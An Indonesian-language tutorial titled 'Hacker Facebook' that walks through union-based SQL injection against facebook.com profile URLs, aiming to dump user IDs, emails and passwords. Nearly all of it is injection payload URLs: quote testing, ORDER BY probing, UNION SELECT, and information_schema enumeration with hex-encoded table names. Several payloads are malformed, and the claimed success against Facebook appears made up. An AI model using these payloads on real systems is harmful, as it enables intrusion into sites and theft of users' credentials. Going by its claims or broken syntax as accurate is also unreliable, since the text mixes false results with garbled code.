Hacker Facebook

1.Cari Target+BUg

       -http://www.facebook.com/profile.php?id=10000056910000(Bisa di ubah                     sesuai id orang yang akan di hack) 
   
       -http://www.facebook.com/profile.php?id=10000056910000'
         [Tambahkan Tanda petik Pada Akhir Url]


 2.Cari colum yang memiliki celah injection
       
        -http://www.facebook.com/profile.php?id=1000005691000+orde+by+1--

        -http://www.facebook.com/profile.php?id=1000005691000+orde+by+2--
        -http://www.facebook.com/profile.php?id=1000005691000+orde+by+3--
        -http://www.facebook.com/profile.php?id=1000005691000+orde+by+4--
        -http://www.facebook.com/profile.php?id=1000005691000+orde+by+5--


3.Gunakan Perintah Union select


        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,3,4,5--


4.Cari Informasi database target


        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,database(),3,4,5--
atau:
        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,user(),version(),4,5--
kemudian satukan jadi:
        -http://www.facebook.com/profile.php?id=1000005691000+union+select+concat(user(),0x3a,database()),version(),4,5--


5. Dapatkan Nama Table


        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--
atau:
        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--
atau:        
        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,group_concat(table_name,4,5+from+information_schema.tables+table=database()--


6. Dapatkan Nama Columns


       -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table=0xhexa--


pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx


Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi


       -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+table=0x7461626c655f75736572--


Alhasil nama colom dari table_user sudah saya dapatkan yaitu user_id/e-mail seseorang tersebut dan password_id.


7. Dapatkan Usename & Password


        -http://www.facebook.com/profile.php?id=1000005691000+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from--



Tampilah seluruh username dan password.

Selamat mencoba

Salam Hangat Untuk Kalian Yang membaca Dari Hacker L4rv4



Sumber: HacketTeamLarvaBandung